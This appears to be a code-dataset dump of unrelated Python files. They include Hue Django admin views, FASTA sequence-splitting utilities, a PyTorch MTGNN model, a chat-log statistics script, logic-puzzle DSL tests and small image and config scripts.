content
stringlengths
5
1.05M
"""Unit tests for cutty.projects."""
#!/usr/bin/env python # Licensed to Cloudera, Inc. under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. Cloudera, Inc. licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import logging import os import sys import tempfile import time import traceback import zipfile from django.shortcuts import render_to_response from django.http import HttpResponse from django.core.servers.basehttp import FileWrapper import django.views.debug from desktop.lib.django_util import login_notrequired, render_json, render from desktop.lib.paths import get_desktop_root from desktop.log.access import access_log_level, access_warn from desktop.models import UserPreferences from desktop import appmanager import desktop.conf import desktop.log.log_buffer LOG = logging.getLogger(__name__) @access_log_level(logging.WARN) def log_view(request): """ We have a log handler that retains the last X characters of log messages. If it is attached to the root logger, this view will display that history, otherwise it will report that it can't be found. """ l = logging.getLogger() for h in l.handlers: if isinstance(h, desktop.log.log_buffer.FixedBufferHandler): return render_to_response("logs.html", dict(log=[l for l in h.buf])) return render_to_response("logs.html", dict(log=["No logs found!"])) @access_log_level(logging.WARN) def download_log_view(request): """ Zip up the log buffer and then return as a file attachment. """ l = logging.getLogger() for h in l.handlers: if isinstance(h, desktop.log.log_buffer.FixedBufferHandler): try: # We want to avoid doing a '\n'.join of the entire log in memory # in case it is rather big. So we write it to a file line by line # and pass that file to zipfile, which might follow a more efficient path. tmp = tempfile.NamedTemporaryFile() log_tmp = tempfile.NamedTemporaryFile("w+t") for l in h.buf: log_tmp.write(l + '\n') # This is not just for show - w/out flush, we often get truncated logs log_tmp.flush() t = time.time() zip = zipfile.ZipFile(tmp, "w", zipfile.ZIP_DEFLATED) zip.write(log_tmp.name, "hue-logs/hue-%s.log" % t) zip.close() length = tmp.tell() # if we don't seek to start of file, no bytes will be written tmp.seek(0) wrapper = FileWrapper(tmp) response = HttpResponse(wrapper,content_type="application/zip") response['Content-Disposition'] = 'attachment; filename=hue-logs-%s.zip' % t response['Content-Length'] = length return response except Exception, e: logging.exception("Couldn't construct zip file to write logs to!") return log_view(request) return render_to_response("logs.html", dict(log=["No logs found!"])) @access_log_level(logging.DEBUG) def prefs(request, key=None): """Get or set preferences.""" if key is None: d = dict( (x.key, x.value) for x in UserPreferences.objects.filter(user=request.user)) return render_json(d) else: if "set" in request.REQUEST: try: x = UserPreferences.objects.get(user=request.user, key=key) except UserPreferences.DoesNotExist: x = UserPreferences(user=request.user, key=key) x.value = request.REQUEST["set"] x.save() return render_json(True) if "delete" in request.REQUEST: try: x = UserPreferences.objects.get(user=request.user, key=key) x.delete() return render_json(True) except UserPreferences.DoesNotExist: return render_json(False) else: try: x = UserPreferences.objects.get(user=request.user, key=key) return render_json(x.value) except UserPreferences.DoesNotExist: return render_json(None) def bootstrap(request): """Concatenates bootstrap.js files from all installed desktop apps.""" # Has some None's for apps that don't have bootsraps. all_bootstraps = [ (app, app.get_bootstrap_file()) for app in appmanager.DESKTOP_APPS if request.user.has_desktop_permission(action="access", app=app.name) ] # Iterator over the streams. concatenated = [ "\n/* %s */\n%s" % (app.name, b.read()) for app, b in all_bootstraps if b is not None ] # HttpResponse can take an iteratable as the first argument, which # is what happens here. return HttpResponse(concatenated, mimetype='text/javascript') _status_bar_views = [] def register_status_bar_view(view): global _status_bar_views _status_bar_views.append(view) @access_log_level(logging.DEBUG) def status_bar(request): """ Concatenates multiple views together to build up a "status bar"/"status_bar". These views are registered using register_status_bar_view above. """ resp = "" for view in _status_bar_views: try: r = view(request) if r.status_code == 200: resp += r.content else: LOG.warning("Failed to execute status_bar view %s" % (view,)) except: LOG.exception("Failed to execute status_bar view %s" % (view,)) return HttpResponse(resp) def dump_config(request): # Note that this requires login (as do most apps). show_private = False conf_dir = os.path.realpath(get_desktop_root('conf')) if not request.user.is_superuser: return HttpResponse("You must be a superuser.") if request.GET.get("private"): show_private = True return render("dump_config.mako", request, dict( show_private=show_private, top_level=desktop.lib.conf.GLOBAL_CONFIG, conf_dir=conf_dir, apps=appmanager.DESKTOP_MODULES)) if sys.version_info[0:2] <= (2,4): def _threads(): import threadframe return threadframe.dict().iteritems() else: def _threads(): return sys._current_frames().iteritems() @access_log_level(logging.WARN) def threads(request): """Dumps out server threads. Useful for debugging.""" if not request.user.is_superuser: return HttpResponse("You must be a superuser.") out = [] for thread_id, stack in _threads(): out.append("Thread id: %s" % thread_id) for filename, lineno, name, line in traceback.extract_stack(stack): out.append(" %-20s %s(%d)" % (name, filename, lineno)) out.append(" %-80s" % (line)) out.append("") return HttpResponse("\n".join(out), content_type="text/plain") @login_notrequired def index(request): return render("index.mako", request, dict( feedback_url=desktop.conf.FEEDBACK_URL.get(), send_dbug_messages=desktop.conf.SEND_DBUG_MESSAGES.get() )) def serve_404_error(request, *args, **kwargs): """Registered handler for 404. We just return a simple error""" access_warn(request, "404 not found") return render_to_response("404.html", dict(uri=request.build_absolute_uri())) def serve_500_error(request, *args, **kwargs): """Registered handler for 500. We use the debug view to make debugging easier.""" if desktop.conf.HTTP_500_DEBUG_MODE.get(): return django.views.debug.technical_500_response(request, *sys.exc_info()) return render_to_response("500.html") _LOG_LEVELS = { "critical": logging.CRITICAL, "error": logging.ERROR, "warning": logging.WARNING, "info": logging.INFO, "debug": logging.DEBUG } _MAX_LOG_FRONTEND_EVENT_LENGTH = 1024 _LOG_FRONTEND_LOGGER = logging.getLogger("desktop.views.log_frontend_event") @login_notrequired def log_frontend_event(request): """ Logs arguments to server's log. Returns an empty string. Parameters (specified via either GET or POST) are "logname", "level" (one of "debug", "info", "warning", "error", or "critical"), and "message". """ def get(param, default=None): return request.REQUEST.get(param, default) level = _LOG_LEVELS.get(get("level"), logging.INFO) msg = "Untrusted log event from user %s: %s" % ( request.user, get("message", "")[:_MAX_LOG_FRONTEND_EVENT_LENGTH]) _LOG_FRONTEND_LOGGER.log(level, msg) return HttpResponse("") def who_am_i(request): """ Returns username and FS username, and optionally sleeps. """ try: sleep = float(request.REQUEST.get("sleep") or 0.0) except ValueError: sleep = 0.0 time.sleep(sleep) return HttpResponse(request.user.username + "\t" + request.fs.user + "\n") # If the app's conf.py has a config_validator() method, call it. CONFIG_VALIDATOR = 'config_validator' # # Cache config errors because (1) they mostly don't go away until restart, # and (2) they can be costly to compute. So don't stress the system just because # the dock bar wants to refresh every n seconds. # # The actual viewing of all errors may choose to disregard the cache. # _CONFIG_ERROR_LIST = None def _get_config_errors(cache=True): """Returns a list of (confvar, err_msg) tuples.""" global _CONFIG_ERROR_LIST if not cache or _CONFIG_ERROR_LIST is None: error_list = [ ] for module in appmanager.DESKTOP_MODULES: # Get the config_validator() function try: validator = getattr(module.conf, CONFIG_VALIDATOR) except AttributeError: continue if not callable(validator): LOG.warn("Auto config validation: %s.%s is not a function" % (module.conf.__name__, CONFIG_VALIDATOR)) continue try: error_list.extend(validator()) except Exception, ex: LOG.exception("Error in config validation by %s: %s" % (module.nice_name, ex)) _CONFIG_ERROR_LIST = error_list return _CONFIG_ERROR_LIST def check_config(request): """Check config and view for the list of errors""" if not request.user.is_superuser: return HttpResponse("You must be a superuser.") conf_dir = os.path.realpath(get_desktop_root('conf')) return render('check_config.mako', request, dict( error_list=_get_config_errors(cache=False), conf_dir=conf_dir)) def status_bar_config_check(request): """Alert administrators about configuration problems.""" if not request.user.is_superuser: return HttpResponse('') error_list = _get_config_errors() if not error_list: # Return an empty response, rather than using the mako template, for performance. return HttpResponse('') return render('config_alert_dock.mako', request, dict(error_list=error_list), force_template=True) register_status_bar_view(status_bar_config_check)
from Bio import SeqIO import pygustus.util as util def summarize_acgt_content(inputfile): util.check_file(inputfile) letters = ['a', 'c', 'g', 't', 'n'] file_sum = dict.fromkeys(letters, 0) file_sum.update({'rest': 0}) seq_count = 0 for seq_record in SeqIO.parse(inputfile, 'fasta'): seq_count += 1 seq_sum = 0 print_seq_acgt = '' for l in letters: value = seq_record.seq.lower().count(l) seq_sum += value if l != 'n': print_seq_acgt += f' {value} {l}' else: if value > 0: print_seq_acgt += f' {value} {l}' update_values(file_sum, l, value) rest = len(seq_record) - seq_sum if rest > 0: print_seq_acgt += f' {rest} ?' update_values(file_sum, 'rest', rest) print_seq_line = f'{len(seq_record)} bases.\t{seq_record.id} BASE COUNT {print_seq_acgt}' print(print_seq_line) summary_acgt = '' complete_bp = 0 sum_acgt = 0 for l in letters: if l != 'n': summary_acgt += f' {file_sum[l]} {l}' complete_bp += file_sum[l] sum_acgt += complete_bp if file_sum['n'] > 0: summary_acgt += f' {file_sum[l]} {l}' complete_bp += file_sum['n'] if file_sum['rest'] > 0: summary_acgt += f' {file_sum[l]} {l}' complete_bp += file_sum['rest'] gc = 100 * float(file_sum['g'] + file_sum['c']) / sum_acgt print(f'summary: BASE COUNT {summary_acgt}') print(f'total {complete_bp}bp in {seq_count} sequence(s).') print(f'gc: {gc}%') def update_values(file_sum, key, value): cur_value = file_sum[key] file_sum.update({key: cur_value + value}) def split(inputfile, outputdir, chunksize, overlap, partition_sequences, minsize, max_seq_size): util.check_file(inputfile) util.rmtree_if_exists(outputdir, even_none_empty=True) util.mkdir_if_not_exists(outputdir) fileidx = 0 run = 0 filesize = 0 records_to_write = list() records = list(SeqIO.parse(inputfile, 'fasta')) run_information = list() for seq_record in records: seqsize = len(seq_record) if seqsize > max_seq_size: if len(records_to_write) > 0: fileidx += 1 run += 1 run_information.append( { 'run': run, 'fileidx': fileidx, 'seqinfo': {x.id: [0, 0] for x in records_to_write} }) write_file(records_to_write, inputfile, outputdir, fileidx) filesize = 0 fileidx += 1 write_file([seq_record], inputfile, outputdir, fileidx) if partition_sequences: if chunksize == 0: chunksize = 2500000 if chunksize > 3500000: chunksize = 3500000 if overlap == 0: overlap = int(chunksize / 6) chunks = list() go_on = True while go_on: if len(chunks) == 0: chunks.append([1, chunksize]) else: last_start, last_end = chunks[-1] start = last_end + 1 - overlap end = start + chunksize - 1 if end >= seqsize: end = seqsize go_on = False chunks.append([start, end]) for c in chunks: run += 1 run_information.append( { 'run': run, 'fileidx': fileidx, 'seqinfo': {seq_record.id: [c[0], c[1]]} }) else: run += 1 run_information.append( { 'run': run, 'fileidx': fileidx, 'seqinfo': {seq_record.id: [0, 0]} }) elif minsize == 0 or filesize + seqsize >= minsize or seq_record.id == records[-1].id: records_to_write.append(seq_record) fileidx += 1 run += 1 run_information.append( { 'run': run, 'fileidx': fileidx, 'seqinfo': {x.id: [0, 0] for x in records_to_write} }) write_file(records_to_write, inputfile, outputdir, fileidx) filesize = 0 else: records_to_write.append(seq_record) filesize += seqsize return run_information def write_file(records_to_write, inputfile, outputdir, fileidx): splitpath = util.create_split_filenanme( inputfile, outputdir, fileidx) SeqIO.write(records_to_write, splitpath, 'fasta') records_to_write.clear() def get_sequence_count(inputfile): util.check_file(inputfile) sequences = list(SeqIO.parse(inputfile, 'fasta')) return len(sequences) def get_sequence_size(inputfile, idx=0): util.check_file(inputfile) sequences = list(SeqIO.parse(inputfile, 'fasta')) return len(sequences[idx]) def get_sequence_id(inputfile, idx=0): util.check_file(inputfile) sequences = list(SeqIO.parse(inputfile, 'fasta')) return sequences[idx].id
import PIL import glob from PIL import Image number = 0 image_list = [] for File in glob.glob('positive_images/*.pgm'): im = Image.open(File) rgb_im = im.convert('RGB') rgb_im.save('newImages/pos-' + str(number)+'.jpg') number = number + 1
CLIQZDEX_URL = "https://raw.githubusercontent.com/InTEGr8or/cliqzdex/main/index.yaml" quiz_url = "https://raw.githubusercontent.com/InTEGr8or/cliqzdex/main/quizzes/" default_max_questions = 10 CONFIG = { "cliqzdex_url": "https://raw.githubusercontent.com/InTEGr8or/cliqzdex/main/index.yaml", "quiz_url": "https://raw.githubusercontent.com/InTEGr8or/cliqzdex/main/quizzes/", "newline": '\n' } class bcolors: HEADER = '\033[95m' OKBLUE = '\033[94m' OKGREEN = '\033[92m' WARNING = '\033[93m' FAIL = '\033[91m' BOLD = '\033[1m' UNDERLINE = '\033[4m' ENDC = '\033[0m'
from django import template register = template.Library() @register.inclusion_tag('blog/tags/meta.html') def meta(*objects): """Вывод description and title категории""" try: object = objects[0][0] except IndexError: object = [] return {"object": object}
"""Custom log messages.""" import re RE_BIND_FAILED = re.compile(r".*Bind for.*:(\d*) failed: port is already allocated.*") def format_message(message: str) -> str: """Return a formated message if it's known.""" match = RE_BIND_FAILED.match(message) if match: return ( f"Port '{match.group(1)}' is already in use by something else on the host." ) return message
from .mtgnn_layers import * class MTGNN(nn.Module): r"""An implementation of the Multivariate Time Series Forecasting Graph Neural Networks. For details see this paper: `"Connecting the Dots: Multivariate Time Series Forecasting with Graph Neural Networks." <https://arxiv.org/pdf/2005.11650.pdf>`_ Args: gcn_true (bool) : whether to add graph convolution layer. buildA_true (bool) : whether to construct adaptive adjacency matrix. gcn_depth (int) : graph convolution depth. num_nodes (int) : number of nodes in the graph. dropout (float, optional) : droupout rate, default 0.3. static_feat (Pytorch Float Tensor, optional) : static feature, default None. predefined_A (Pytorch Float Tensor, optional) : predefined adjacency matrix, default None. subgraph_size (int, optional) : size of subgraph, default 20. node_dim (int, optional) : dimension of nodes, default 40. dilation_exponential (int, optional) : dilation exponential, default 1. conv_channels (int, optional) : convolution channels, default 32. residual_channels (int, optional) : residual channels, default 32. skip_channels (int, optional) : skip channels, default 64. end_channels (int, optional): end channels, default 128. seq_length (int, optional) : length of input sequence, default 12. in_dim (int, optional) : input dimension, default 2. out_dim (int, optional) : output dimension, default 12. layers (int, optional) : number of layers, default 3. propalpha (float, optional) : prop alpha, ratio of retaining the root nodes's original states in mix-hop propagation, a value between 0 and 1, default 0.05. tanhalpha (float, optional) : tanh alpha for generating adjacency matrix, alpha controls the saturation rate, default 3. layer_norm_affline (bool, optional) : whether to do elementwise affine in Layer Normalization, default True. """ def __init__(self, gcn_true, buildA_true, gcn_depth, num_nodes, predefined_A=None, static_feat=None, dropout=0.3, subgraph_size=20, node_dim=40, dilation_exponential=1, conv_channels=32, residual_channels=32, skip_channels=64, end_channels=128, seq_length=12, in_dim=2, out_dim=12, layers=3, propalpha=0.05, tanhalpha=3, layer_norm_affline=True): super(MTGNN, self).__init__() self.gcn_true = gcn_true self.buildA_true = buildA_true self.num_nodes = num_nodes self.dropout = dropout self.predefined_A = predefined_A self.filter_convs = nn.ModuleList() self.gate_convs = nn.ModuleList() self.residual_convs = nn.ModuleList() self.skip_convs = nn.ModuleList() self.gconv1 = nn.ModuleList() self.gconv2 = nn.ModuleList() self.norm = nn.ModuleList() self.start_conv = nn.Conv2d(in_channels=in_dim, out_channels=residual_channels, kernel_size=(1, 1)) self.gc = graph_constructor(num_nodes, subgraph_size, node_dim, alpha=tanhalpha, static_feat=static_feat) self.seq_length = seq_length kernel_size = 7 if dilation_exponential>1: self.receptive_field = int(1+(kernel_size-1)*(dilation_exponential**layers-1)/(dilation_exponential-1)) else: self.receptive_field = layers*(kernel_size-1) + 1 for i in range(1): if dilation_exponential>1: rf_size_i = int(1 + i*(kernel_size-1)*(dilation_exponential**layers-1)/(dilation_exponential-1)) else: rf_size_i = i*layers*(kernel_size-1)+1 new_dilation = 1 for j in range(1,layers+1): if dilation_exponential > 1: rf_size_j = int(rf_size_i + (kernel_size-1)*(dilation_exponential**j-1)/(dilation_exponential-1)) else: rf_size_j = rf_size_i+j*(kernel_size-1) self.filter_convs.append(dilated_inception(residual_channels, conv_channels, dilation_factor=new_dilation)) self.gate_convs.append(dilated_inception(residual_channels, conv_channels, dilation_factor=new_dilation)) self.residual_convs.append(nn.Conv2d(in_channels=conv_channels, out_channels=residual_channels, kernel_size=(1, 1))) if self.seq_length>self.receptive_field: self.skip_convs.append(nn.Conv2d(in_channels=conv_channels, out_channels=skip_channels, kernel_size=(1, self.seq_length-rf_size_j+1))) else: self.skip_convs.append(nn.Conv2d(in_channels=conv_channels, out_channels=skip_channels, kernel_size=(1, self.receptive_field-rf_size_j+1))) if self.gcn_true: self.gconv1.append(mixprop(conv_channels, residual_channels, gcn_depth, dropout, propalpha)) self.gconv2.append(mixprop(conv_channels, residual_channels, gcn_depth, dropout, propalpha)) if self.seq_length>self.receptive_field: self.norm.append(LayerNorm((residual_channels, num_nodes, self.seq_length - rf_size_j + 1),elementwise_affine=layer_norm_affline)) else: self.norm.append(LayerNorm((residual_channels, num_nodes, self.receptive_field - rf_size_j + 1),elementwise_affine=layer_norm_affline)) new_dilation *= dilation_exponential self.layers = layers self.end_conv_1 = nn.Conv2d(in_channels=skip_channels, out_channels=end_channels, kernel_size=(1,1), bias=True) self.end_conv_2 = nn.Conv2d(in_channels=end_channels, out_channels=out_dim, kernel_size=(1,1), bias=True) if self.seq_length > self.receptive_field: self.skip0 = nn.Conv2d(in_channels=in_dim, out_channels=skip_channels, kernel_size=(1, self.seq_length), bias=True) self.skipE = nn.Conv2d(in_channels=residual_channels, out_channels=skip_channels, kernel_size=(1, self.seq_length-self.receptive_field+1), bias=True) else: self.skip0 = nn.Conv2d(in_channels=in_dim, out_channels=skip_channels, kernel_size=(1, self.receptive_field), bias=True) self.skipE = nn.Conv2d(in_channels=residual_channels, out_channels=skip_channels, kernel_size=(1, 1), bias=True) self.idx = torch.arange(self.num_nodes) def forward(self, input, idx=None): """ Making a forward pass of MTGNN. Arg types: * input (PyTorch Float Tensor) - input sequence, with shape (batch size, input dimension, number of nodes, input sequence length). * idx (Tensor, optional): input indices, a permutation of the number of nodes, default None (no permutation). Return types: * x (PyTorch Float Tensor) - output sequence for prediction, with shape (batch size, input sequence length, number of nodes, 1). """ seq_len = input.size(3) assert seq_len==self.seq_length, 'input sequence length not equal to preset sequence length' if self.seq_length<self.receptive_field: input = nn.functional.pad(input,(self.receptive_field-self.seq_length,0,0,0)) if self.gcn_true: if self.buildA_true: if idx is None: adp = self.gc(self.idx.to(input.device)) else: adp = self.gc(idx) else: adp = self.predefined_A x = self.start_conv(input) skip = self.skip0(F.dropout(input, self.dropout, training=self.training)) for i in range(self.layers): residual = x filter = self.filter_convs[i](x) filter = torch.tanh(filter) gate = self.gate_convs[i](x) gate = torch.sigmoid(gate) x = filter * gate x = F.dropout(x, self.dropout, training=self.training) s = x s = self.skip_convs[i](s) skip = s + skip if self.gcn_true: x = self.gconv1[i](x, adp)+self.gconv2[i](x, adp.transpose(1,0)) else: x = self.residual_convs[i](x) x = x + residual[:, :, :, -x.size(3):] if idx is None: x = self.norm[i](x,self.idx) else: x = self.norm[i](x,idx) skip = self.skipE(x) + skip x = F.relu(skip) x = F.relu(self.end_conv_1(x)) x = self.end_conv_2(x) return x
import logging import sys from metanime import Anime, Renderer def render(season): animes = Anime.load(f'seasons/{season}.yml') renderer = Renderer('views', 'docs') for anime in animes: renderer.render_anime(anime) renderer.render_season(season, animes) if __name__ == '__main__': logging.basicConfig(level=logging.INFO) render(sys.argv[1])
#!/usr/bin/env python from yaml import load, dump from collections import OrderedDict import time, os from visualize import visualize DIV = '\n'+ '='*64 + '\n' start_time = time.time() def usage(): pass # Iterate over all conversation threads def summarize(): print 'Opening file... ', file = open('messages_jacob.yaml', 'r') print 'successful!' print 'Parsing file... ', messages = load(file) print 'successful!' + DIV x = 1 for thread in messages: message_contribution = {'Jacob Ziontz': 0} # Iterate over all messages in a thread for message in thread['messages']: try: message_contribution[message['sender']] += 1 except KeyError: message_contribution[message['sender']] = 1 # Print outputs print 'Thread', x print len(message_contribution), 'participants, ', print len(thread['messages'] ), 'messages' for participant, count in message_contribution.iteritems(): print '\t', participant.encode('utf-8').strip(), ' - ', count print '\n' x += 1 print 'Total number of conversations:', x def conversation_separator(): print 'Opening file... ', file = open('messages_jacob.yaml', 'r') print 'successful!' print 'Parsing file... ', messages = load(file) print 'successful!' + DIV count = 1 for thread in messages: filename = 'conversations_jacob/%d.yaml' % count if not os.path.exists('conversations_jacob'): print 'Creating directory conversations_jacob' try: os.makedirs('conversations_jacob') except OSError as exc: # Guard against race condition raise print 'Writing', filename conversation_file = open(filename, 'w') dump(thread, conversation_file) count += 1 print '(%s seconds)' % round((time.time() - start_time), 2) # Generates insight data on a single conversation thread def insight(): print 'Opening thread... ', file = open('conversations_test/440.yaml', 'r') print 'successful!' print 'Loading thread... ', thread = load(file) print 'successful!' + DIV # 1. Pie chart showing contribution of messages by each person message_contribution = {'Alvin Cao': 0} for message in thread['messages']: try: message_contribution[message['sender']] += 1 except KeyError: message_contribution[message['sender']] = 1 print message_contribution # 2. Line chart showing messages per month messages_over_time = {} for message in thread['messages']: try: messages_over_time[message['date'].partition('T')[0][:7]] += 1 except KeyError: messages_over_time[message['date'].partition('T')[0][:7]] = 1 for elem in OrderedDict(sorted(messages_over_time.items(), key=lambda t: t[0])).items(): messages_over_time[elem[0]] = elem[1] def break_message(message): if message == '': return '(sticker/emoji)' if len(message) <= 56: return message accumulate = 0 broken_message = '' for word in message.split(' '): if len(word) >= 56: return word[:56] + '<br>' + word[56:] accumulate += len(word) + 1 print accumulate broken_message += word + ' ' if accumulate >= 56: broken_message += '<br>' accumulate = 0 return broken_message # 3. Get first message for message in thread['messages']: first_message = message['sender'] + ', ' first_message += message['date'].partition('T')[0][:10] first_message += '<br>' + break_message(message['message']) break print first_message visualize(message_contribution, messages_over_time, first_message) # Execute one at a time in order #summarize() #conversation_separator() insight()
import collections from data.logic.dsl import * from spec.mamba import * with description('dsl'): with before.each: self.dimensions = DimensionFactory() self.model = Model(self.dimensions) with it('defines dimensions'): (Andy, Bob, Cathy) = name = self.dimensions(name=['Andy', 'Bob', 'Cathy']) (CEO, Project_Manager, Analyst) = occupation = self.dimensions( occupation=['CEO', 'Project Manager', 'analyst']) (_10, _11, _12) = age = self.dimensions(age=[10, 11, 12]) expect(self.dimensions.dimensions()).to(have_len(3)) with description('with setup'): with before.each: (self.Andy, self.Bob, self.Cathy) = self.name = self.dimensions( name=['Andy', 'Bob', 'Cathy']) (self.CEO, self.Project_Manager, self.Analyst) = self.occupation = ( self.dimensions(occupation=['CEO', 'Project Manager', 'analyst'])) (self._10, self._11, self._12) = self.age = self.dimensions( age=[10, 11, 12]) with it('accumulates constraints'): self.model(self.Andy == self.Analyst) expect(self.model.constraints).to(have_len(1)) with it('supports diverse constraints'): self.model(self.Andy.occupation == self.Analyst) self.model((11 == self.Bob.age) ^ (11 == self.Analyst.age)) self.model(self.CEO.age + 2 == self.Andy.age) expect(str(self.model)).to(look_like(""" assign: name["Andy"].occupation["analyst"] in {0,1} name["Bob"].age in {10..12} occupation["analyst"].age in {10..12} name["Andy"].age in {10..12} occupation["CEO"].age in {10..12} subject to: (name["Andy"].occupation["analyst"] == True) (((name["Bob"].age == 11) + (occupation["analyst"].age == 11)) == 1) (name["Andy"].age == (occupation["CEO"].age + 2)) """)) with description('2D solutions'): with before.each: (self.Andy, self.Bob, self.Cathy) = self.name = self.dimensions( name=['Andy', 'Bob', 'Cathy']) (self._10, self._11, self._12) = self.age = self.dimensions( age=[10, 11, 12]) with it('volunteers a valid solution without any context'): name_counter = collections.Counter() age_counter = collections.Counter() solver = self.model.load('Mistral') solver.solve() expect(str(solver)).to(look_like(""" name | age Andy | 10 Bob | 11 Cathy | 12 """)) with it('finds correct solution with constraints'): # Force Bob == 12. self.model(~self.Andy[12]) self.model(~self.Cathy[12]) # Force Cathy == 10 self.model(~self.name['Cathy'][11]) expect(str(self.model)).to(look_like(""" assign: name["Andy"].age in {10..12} name["Cathy"].age in {10..12} subject to: ((1 - (name["Andy"].age == 12)) == True) ((1 - (name["Cathy"].age == 12)) == True) ((1 - (name["Cathy"].age == 11)) == True) """)) solver = self.model.load('Mistral') expect(solver.solve()).to(be_true) expect(str(solver)).to(look_like(""" name | age Andy | 11 Bob | 12 Cathy | 10 """)) with it('finds solutions with reified dimension inequalities'): # Force Andy between Cathy and Bob. self.model(self.name['Andy']['age'] > self.name['Cathy']['age']) self.model(self.name['Andy']['age'] < self.name['Bob']['age']) solver = self.model.load('Mistral') expect(solver.solve()).to(be_true) expect(str(solver)).to(look_like(""" name | age Andy | 11 Bob | 12 Cathy | 10 """)) with it('finds solutions with reified dimension offsets'): # Cathy = Bob - 2. self.model(self.name['Cathy']['age'] == self.name['Bob']['age'] - 2) solver = self.model.load('Mistral') expect(solver.solve()).to(be_true) expect(str(solver)).to(look_like(""" name | age Andy | 11 Bob | 12 Cathy | 10 """)) with it('support for abs()'): self.model(abs(self.name['Andy']['age'] - self.name['Cathy']['age']) == 2) self.model(self.name['Cathy']['age'] > self.name['Andy']['age']) solver = self.model.load('Mistral') expect(solver.solve()).to(be_true) expect(str(solver)).to(look_like(""" name | age Andy | 10 Bob | 11 Cathy | 12 """)) expect(solver.solve()).to(be_false) with description('3D solutions'): with before.each: (self.Andy, self.Bob, self.Cathy) = self.name = self.dimensions( name=['Andy', 'Bob', 'Cathy']) (self.CEO, self.Project_Manager, self.Analyst) = self.occupation = ( self.dimensions(occupation=['CEO', 'Project Manager', 'Analyst'])) (self._10, self._11, self._11) = self.age = self.dimensions( age=[10, 11, 11]) with it('volunteers a valid solution without any context'): seen = collections.Counter() solver = self.model.load('Mistral') solver.solve() for variable_name, value in self.model._variable_cache.items(): x, y = variable_name.split('.') if value.get_value(): seen[x] += 1 seen[y] += 1 # Each value is part of 2 tables except for 11 which appears 2x. expect(seen).to(equal({ 'name["Andy"]': 2, 'name["Bob"]': 2, 'name["Cathy"]': 2, 'occupation["CEO"]': 2, 'occupation["Project Manager"]': 2, 'occupation["Analyst"]': 2, 'age[10]': 2, 'age[11]': 4, })) with it('produces a correct solution with constraints'): # CEO is not the youngest. self.model(self.CEO['age'] >= self.Project_Manager['age']) self.model(self.CEO['age'] >= self.Analyst['age']) # Andy is a year younger than Bob. self.model(self.Andy['age'] + 1 == self.Bob['age']) # Cathy is older than the Project_Manager. self.model(self.Cathy['age'] > self.Project_Manager['age']) # Bob is either the CEO or the Project Manager. self.model(self.Bob['Analyst'] | self.Bob['Project Manager']) solver = self.model.load('Mistral') expect(solver.solve()).to(be_true) expect(str(solver)).to(look_like(""" name | occupation | age Andy | Project Manager | 10 Bob | Analyst | 11 Cathy | CEO | 11 """)) # Verify there are no other solutions. expect(solver.solve()).to(be_false) with it('infers a solution despite duplicates'): # Cathy is CEO (constrain the two values with cardinality of 1). self.model(self.Cathy == self.CEO) # CEO is older (constrains CEO to one of the 11 values). self.model(self.CEO.age > self.Project_Manager.age) solver = self.model.load('Mistral') solutions = [] while solver.solve(): solutions.append(str(solver)) solutions = list(sorted(solutions)) expected_solutions = [ """ name | occupation | age Andy | Analyst | 11 Bob | Project Manager | 10 Cathy | CEO | 11 """, """ name | occupation | age Andy | Project Manager | 10 Bob | Analyst | 11 Cathy | CEO | 11 """, ] expect(solutions).to(have_len(len(expected_solutions))) for solution, expected in zip(solutions, expected_solutions): expect(solution).to(look_like(expected)) with it('models additional variables'): # Cathy is CEO (constrain the two values with cardinality of 1). self.model(self.Cathy == self.CEO) # CEO is older (constrains CEO to one of the 11 values). self.model(self.CEO.age > self.Project_Manager.age) ceo_is_old = variable('ceo_is_old') self.model(ceo_is_old == (self.CEO == self._11)) expect(str(self.model)).to(look_like(""" assign: name["Cathy"].occupation["CEO"] in {0,1} occupation["CEO"].age[10] in {0,1} occupation["CEO"].age[11] in {0,1} occupation["Project Manager"].age[10] in {0,1} occupation["Project Manager"].age[11] in {0,1} ceo_is_old in {0,1} subject to: (name["Cathy"].occupation["CEO"] == True) ((10*occupation["CEO"].age[10] + 11*occupation["CEO"].age[11]) > (10*occupation["Project Manager"].age[10] + 11*occupation["Project Manager"].age[11])) (occupation["CEO"].age[11] == ceo_is_old) """))
import cv2 import numpy as np from DAL_utils.overlaps_cuda.rbbox_overlaps import rbbx_overlaps from DAL_utils.overlaps.rbox_overlaps import rbox_overlaps a = np.array([[10, 10, 20, 10, 0]], dtype=np.float32) b = np.array([[10, 10, 20, 10, 0]], dtype=np.float32) c = rbbx_overlaps(a, b) d = rbox_overlaps(a, b) print(c) print(d) # def iou_rotate_calculate(boxes1, boxes2): # area1 = boxes1[2] * boxes1[3] # area2 = boxes2[2] * boxes2[3] # r1 = ((boxes1[0], boxes1[1]), (boxes1[2], boxes1[3]), boxes1[4]) # r2 = ((boxes2[0], boxes2[1]), (boxes2[2], boxes2[3]), boxes2[4]) # # int_pts = cv2.rotatedRectangleIntersection(r1, r2)[1] # if int_pts is not None: # order_pts = cv2.convexHull(int_pts, returnPoints=True) # # int_area = cv2.contourArea(order_pts) # # inter = int_area * 1.0 / (area1 + area2 - int_area) # return inter # else: # return 0.0 # # for i in range(100): # a = np.array([np.random.randn()]) # a = np.array([1, 0.5, 2, 1, 0]) # a = np.array([1, 0.5, 1, 2, 90]) # b = np.array([0.5, 1, 2, 1, -90]) # # iou = iou_rotate_calculate(a, b) # print(iou) # cnt = np.array([[0, 0], [2, 0], [2, 2], [0, 2]]) # cnt = np.array([[0, 2], [2, 0], [3, 1], [1, 3]]) # cnt = np.array([[0, 1], [1, 0], [3, 2], [2, 3]]) # # rect = cv2.minAreaRect(cnt) # box = cv2.boxPoints(rect) # box = np.int0(box) # print(rect) # print(box) # rect = ((1.5, 1.5), (2.8284271, 1.4142135), -45) # box = cv2.boxPoints(rect) # print(box) # a = np.array([[10, 10, 20, 10, 0]], dtype=np.float32) # b = np.array([[10, 10, 40, 10, 0]], dtype=np.float32) # c = rbbx_overlaps(a, b) # d = rbox_overlaps(a, b) # print(c) # print(d)
